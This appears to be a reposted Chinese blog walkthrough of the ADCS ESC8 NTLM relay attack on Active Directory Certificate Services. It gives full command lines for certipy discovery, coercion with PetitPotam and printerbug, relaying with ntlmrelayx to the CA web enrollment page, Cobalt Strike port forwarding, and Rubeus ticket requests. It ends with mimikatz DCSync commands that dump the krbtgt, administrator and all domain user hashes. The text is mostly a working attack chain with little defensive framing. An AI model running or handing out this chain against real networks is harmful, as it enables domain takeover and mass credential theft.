ADCS攻击之NTLM Relay攻击 ESC8

CSDN文章迁移备份

漏洞简介

ADCS在默认安装的时候,其Web接口支持NTLM身份验证并且没有启用任何NTLM Relay保护措施。强制域控制器计算机帐户(DC$)向配置了NTLM中继的主机进行身份验证。身份验证被转发给证书颁发机构(CA)并提出对证书的请求。获取到了DC$的证书后就可以为用户/机器请求TGS/TGT票据,获取相应的权限。

curl http://192.168.11.12/certsrv/ -I

存在ntlm认证:

ADCS攻击之NTLM Relay攻击 ESC8_第1张图片
http://192.168.11.12/certsrv/certfnsh.asp
ADCS攻击之NTLM Relay攻击 ESC8_第2张图片

漏洞利用

# 探测是否存在漏洞

certipy find -u [email protected] -p zs@123456 -dc-ip 192.168.149.133 -vulnerable -stdout

certipy find -u [email protected] -p 321.com -dc-ip 192.168.11.11 -vulnerable -stdout

ADCS攻击之NTLM Relay攻击 ESC8_第3张图片

域内

# 待打,因为会使RPC临时性关闭,需要重启
​
execute-assembly ADCSPwn.exe --adcs ADCS.attack.cn --remote DC.attack.cn
​
ADCSPwn.exe --adcs ADCS.attack.cn --remote DC.attack.cn
CS:
execute-assembly Rubeus.exe asktgt /user:DC2012$ /certificate: /ptt
​
dcsync red.lab red\krbtgt
使用ADCSpwn打ESC8需要域控启用WebClient服务,默认是没有安装该功能的。 DC安装桌面体验重启即可:

域外

ntlmrelayx监听获取TGT
# 进行监听
#端口转发
PortBender redirect 445 8445
rportfwd_local 8445 127.0.0.1 8445
python3 ntlmrelayx.py -t http://192.168.11.12/certsrv/certfnsh.asp -smb2support --adcs --template DomainController --smb-port 8445
-------------------------------------------------------
python3 ntlmrelayx.py -t http://192.168.11.12/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'

将WIN10(域用户机器)的445端口流量备份到8445,然后将WIN10-8445端口转发到CS client端的8445端口,实战中还需要通过socks隧道用proxychains将relay的流量打入到目标环境。因为CS client是通目标IP的,就未作模拟。

ADCS攻击之NTLM Relay攻击 ESC8_第4张图片
# 进行强认证的连接,让域控强制来访问攻击机kali
# 通过监听获取到机器用户的TGT
python3 PetitPotam.py Relayip DCip
python3 PetitPotam.py 192.168.11.6 192.168.11.11
python3 PetitPotam.py -u '' -p '' 192.168.11.6 192.168.11.11
ADCS攻击之NTLM Relay攻击 ESC8_第5张图片
printerbug:
python3 printerbug.py attack/zhang:[email protected] 192.168.11.6
ADCS攻击之NTLM Relay攻击 ESC8_第6张图片

Rebeus 导入证书数据

1、CS操作:
​
Rubeus.exe asktgt /user:dc$ /certificate:xxxxxxxx /ptt
execute-assembly Rubeus.exe asktgt /user:DC$ /certificate: /ptt
​
dcsync red.lab red\krbtgt
​
2、mimikatz操作
​
Rubeus.exe asktgt /user:dc$ /certificate:xxxxxxxx /ptt
​
mimikatz.exe
kerberos::list #查看kerberos票据
kerberos::purge #清空以前的票据
kerberos::ptt ticket.kirbi #导入票据
lsadump::dcsync /user:krbtgt /csv #导出krbtgt用户的hash
lsadump::dcsync /user:administrator /csv #导出administrator用户的hash
lsadump::dcsync /user:krbtgt /csv #导出krbtgt用户的hash
lsadump::dcsync /all /csv #导出全部用户的hash
​
Rubeus两种使用方式:
1、Rubeus获取到后,保存为ticket.kirbi,使用mimikatz进行导入票据进而利用
2、Rubeus获取到ticket后直接ptt,mimikatz可直接利用 (首选)
ADCS攻击之NTLM Relay攻击 ESC8_第7张图片
ADCS攻击之NTLM Relay攻击 ESC8_第8张图片
ADCS攻击之NTLM Relay攻击 ESC8_第9张图片

转载请注明:Adminxe's Blog » ADCS攻击之NTLM Relay攻击 ESC8

你可能感兴趣的:(内网渗透,ADCS,ESC8,证书模板配置错误,内网渗透,域渗透)